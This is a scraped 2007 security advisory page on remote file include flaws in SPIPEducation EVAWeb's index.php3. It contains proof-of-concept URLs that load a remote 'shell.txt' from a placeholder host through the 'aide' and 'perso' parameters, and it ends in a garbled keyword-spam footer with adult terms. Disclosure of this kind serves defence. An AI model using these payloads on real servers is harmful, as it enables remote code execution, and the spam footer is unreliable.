about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Eva-Web Index.PHP3 Multiple Remote File Include Vulnerabilities


Title Eva-Web Index.PHP3 Multiple Remote File Include Vulnerabilities
Published 2007-06-27-12:00AM
Updated 2007-06-28-05:08PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  MurderSkillz is credited with the discovery of these vulnerabilities.
Vulnerable  SPIPEducation EVAWeb 2.1.2
SPIPEducation EVAWeb 2.2
SPIPEducation EVAWeb 2.1
SPIPEducation EVAWeb 2.0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.com/[path to webapp]/eva/index.php3?aide=http://www.example2.com/shell.txt?
http://www.example.com/[path to webapp]/eva/index.php3?perso=http://www.example2.com/shell.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 12:48:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
special pr ring www.xmchua cg998.zw78 otob Hot sexy p Pene sql inject php-nuke 2 maxcpm.inf dada Www 86sex. Rayban gla news for c Sex indo v Sex ocean www.tsznet Nullsoft S Vidio sex bypass dow ftp iois bournultim www.14kk.c www.uggboo www.xibosi www.sdh88. Xxxanal ADODB+SQL+ config.inc 51-sf.cn php-nuke 2 arabic fre netcat%252 Trisha bat remote fil GOM Free viedo news for c aarab sex spoof wanshunda9 vftp younggirls gerlssex joyangeles iilokeryri Movie porn CMS is Fre sexyvedeo for sxey